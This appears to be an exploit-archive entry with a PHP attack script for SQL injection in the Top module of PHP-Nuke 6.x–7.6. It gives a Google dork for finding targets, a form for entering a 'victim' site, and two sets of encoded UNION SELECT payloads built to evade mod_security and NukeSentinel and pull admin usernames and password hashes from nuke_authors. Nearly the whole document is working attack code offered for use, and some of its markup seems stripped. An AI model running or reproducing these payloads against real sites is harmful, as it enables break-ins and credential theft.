# Exploit Title: PHP-Nuke ( SQL injection Top Module + protection Bypass ) # Google Dork: intext: Powered by PHP-Nuke # Date: 2024-10-07 # Exploit Author: Emiliano Febbi # Vendor Homepage: https://phpnuke.org/ # Software Link: https://sourceforge.net/projects/phpnuke/files/phpnuke/ # Version: 6.x < 7.6 # Tested on: Windows 10 [code] ->New concept of exploit writing, CMS protections are useless. ->Very fast usage. PHP-Nuke SQL injection / Bypass Protections
new exploit concept
######################################################################
#This exploit is for Top Module of PHP-Nuke 6.x < 7.6                #
#auto-bypass *illegal operation* , *mod security* , *NukeSentinel*   #
#allowed http and https protocols. Code by Emiliano Febbi            #
######################################################################
~ insert victim site ~ (*the folder must be specified)



'; if($_POST['victim']) { $site = $_POST['victim']; $j = $_POST['exploit_nuke']; switch ($j) { /*#method1*/ case "one": /*#Get info from victim site*/ if (false!==file("$site/admin.php")) echo "~Admin Login Found!

"; else echo "~missing Admin Login

"; if (false!==file("$site/modules.php?name=Top")) echo "#Top Module Active!
"; else echo "#Top Module not Active!
"; print '--------------------------------------
'; /*#Get user1*/ print "#user1:
"; $content_user=file_get_contents("$site/modules.php?name=Top&querylang=%20WHERE%201=2+%23xyz%0AUnIOn%23xyz%0ASeLecT+1,aid,1,1%20FROM%20nuke_authors--"); $comment_user=explode('',$content_user); $comment_user=explode("",$comment_user[1]); var_dump(strip_tags($comment_user[0])); echo "
"; /*#Get pwd1*/ print "#password1:
"; $content=file_get_contents("$site/modules.php?name=Top&querylang=%20WHERE%201=2+%23xyz%0AUnIOn%23xyz%0ASeLecT+1,pwd,1,1%20FROM%20nuke_authors--"); $comment=explode('',$content); $comment=explode("",$comment[1]); var_dump(strip_tags($comment[0])); echo "
"; /*#Get user2*/ print "#user2:
"; $content_user2=file_get_contents("$site/modules.php?name=Top&querylang=%20WHERE%201=2+%23xyz%0AUnIOn%23xyz%0ASeLecT+1,aid,1,1%20FROM%20nuke_authors--"); $comment_user2=explode('',$content_user2); $comment_user2=explode("",$comment_user2[2]); var_dump(strip_tags($comment_user2[0])); echo "
"; /*#Get pwd2*/ print "#password2:
"; $content2=file_get_contents("$site/modules.php?name=Top&querylang=%20WHERE%201=2+%23xyz%0AUnIOn%23xyz%0ASeLecT+1,pwd,1,1%20FROM%20nuke_authors--"); $comment2=explode('',$content2); $comment2=explode("",$comment2[2]); var_dump(strip_tags($comment2[0])); echo "
"; break; /*###################################################################################################################################*/ case "two": /*#method2*/ /*#Get info from victim site*/ if (false!==file("$site/admin.php")) echo "~Admin Login Found!

"; else echo "~missing Admin Login

"; if (false!==file("$site/modules.php?name=Top")) echo "#Top Module Active!
"; else echo "#Top Module not Active!
"; print '--------------------------------------
'; /*#Get user1*/ print "#user1:
"; $content_userj=file_get_contents("$site/modules.php?name=Top&querylang=+UnIOn%0D%0ASeleCt%0D%0A+0,aid,0,0+from+nuke_authors--"); $comment_userj=explode('',$content_userj); $comment_userj=explode("",$comment_userj[1]); var_dump(strip_tags($comment_userj[0])); echo "
"; /*#Get pwd1*/ print "#password1:
"; $content_userp=file_get_contents("$site/modules.php?name=Top&querylang=+UnIOn%0D%0ASeleCt%0D%0A+0,pwd,0,0+from+nuke_authors--"); $comment_userp=explode('',$content_userp); $comment_userp=explode("",$comment_userp[1]); var_dump(strip_tags($comment_userp[0])); echo "
"; /*#Get user2*/ print "#user2:
"; $content_userz=file_get_contents("$site/modules.php?name=Top&querylang=+UnIOn%0D%0ASeleCt%0D%0A+0,aid,0,0+from+nuke_authors--"); $comment_userz=explode('',$content_userz); $comment_userz=explode("",$comment_userz[2]); var_dump(strip_tags($comment_userz[0])); echo "
"; /*#Get pwd2*/ print "#password2:
"; $content_userq=file_get_contents("$site/modules.php?name=Top&querylang=+UnIOn%0D%0ASeleCt%0D%0A+0,pwd,0,0+from+nuke_authors--"); $comment_userq=explode('',$content_userq); $comment_userq=explode("",$comment_userq[2]); var_dump(strip_tags($comment_userq[0])); echo "
"; break; };; };;; ?> [/code]